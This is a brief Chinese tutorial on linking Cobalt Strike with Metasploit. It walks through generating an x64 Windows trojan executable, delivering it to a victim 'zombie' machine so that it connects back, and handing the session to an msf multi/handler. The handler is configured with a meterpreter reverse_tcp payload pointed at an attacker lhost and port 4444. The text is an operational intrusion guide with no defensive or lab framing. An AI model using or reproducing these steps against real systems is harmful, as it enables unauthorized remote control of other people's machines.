Cobalt Strike与Metasploit联动
木马传入:
创建一个监听器,名字随便,Hosts中添加你的服务端的utl或者ip,port必须更改为没有占用的端口
点击攻击,选择WIndows Executable
监听器选择刚才创建的,勾选X64,保存生成的exe木马
将木马传入被攻击的机器
点击运行,cs上线
与Metasploit联动:
msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.
set lport 4444
run -j
创建两个监听器,一个使用windows/beacon_http/reverse_http来监听肉鸡,另一个使用windows/foreign/reverse_http来将获取到的控制权传给msf(注意:这里的端口要与msf监听的端口一致)
点击增加会话,添加刚才创建的监听器
成功上线